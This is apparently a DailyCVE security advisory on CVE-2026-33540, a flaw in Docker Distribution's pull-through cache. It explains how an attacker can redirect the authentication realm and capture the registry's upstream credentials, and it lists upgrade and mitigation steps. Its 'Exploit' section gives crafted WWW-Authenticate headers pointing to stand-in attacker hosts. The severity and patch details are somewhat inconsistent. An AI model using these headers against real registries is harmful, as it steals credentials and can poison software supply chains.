Distribution, Authentication Bypass, CVE-2026-33540 (Critical)

Listen to this Post

This vulnerability, similar to CVE-2020-15157 in containerd, allows credential exfiltration from Docker Registry’s pull-through cache.
When configured as a pull-through cache, the Docker Registry acts as a proxy. It forwards a client’s request for an image to an upstream registry. If the upstream registry requires authentication, it responds with an HTTP 401 Unauthorized status and a `WWW-Authenticate: Bearer realm=”…”` header.
The vulnerable code in `registry/proxy/proxyauth.go` (lines 66-81) extracts the `realm` URL from this header without validating its destination. It then uses this URL to request a token. In the `internal/client/auth/session.go` code (lines 429-434 and 485-510), the registry sends the configured upstream credentials (via Basic Authentication) to this `realm` URL.
An attacker who controls the upstream registry, or is in a position to perform a Man-in-the-Middle (MitM) attack, can modify the `WWW-Authenticate` response. They set the `realm` URL to a server they control. Consequently, the vulnerable distribution will send the upstream credentials to the attacker’s server, leading to their exfiltration.
The official fix in version 3.1.0 implements strict validation, ensuring the `realm` host matches the configured upstream host.

DailyCVE Form:

Platform: Docker Registry
Version: before 3.1.0
Vulnerability: Credential Exfiltration
Severity: High
Date: 2026-04-06

Prediction: Patch 2026-04-30

What Undercode Say:

Analytics:

Command to check if you are running an affected version
docker run --rm distribution/registry:2 --version
Expected output for vulnerable versions: distribution/registry v2.8.1 or earlier (pre-3.1.0)
Command to simulate the vulnerable realm extraction logic (illustrative)
echo "WWW-Authenticate: Bearer realm=\"https://attacker.com/token\"" | grep -oP 'realm="\K[^"]+'

Exploit:

An attacker controlling the upstream registry sends a crafted `WWW-Authenticate` header:
`WWW-Authenticate: Bearer realm=”https://attacker-controlled.com/catch-creds”`
The distribution client then makes an HTTP GET request to https://attacker-controlled.com/catch-creds` with the `Authorization: Basic ` header.
<h2 style="color: blue;">Protection from this CVE:</h2>
1. Update: Immediately upgrade to Registry version 3.1.0 or later.
2. Mitigation: If updating is not possible, strictly enforce that the `realm` URL in the `WWW-Authenticate` header matches the upstream registry's hostname. Implement network policies to restrict outbound connections from the distribution instance to only known, trusted endpoints.
3. Verification: After applying the fix, confirm that Basic Authentication is no longer sent to any untrusted or external
realm`.

Impact:

Successful exploitation leads to the disclosure of the upstream registry’s credentials. This can allow an attacker to gain unauthorized read/write access to the container images stored in the upstream registry, potentially poisoning the software supply chain.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top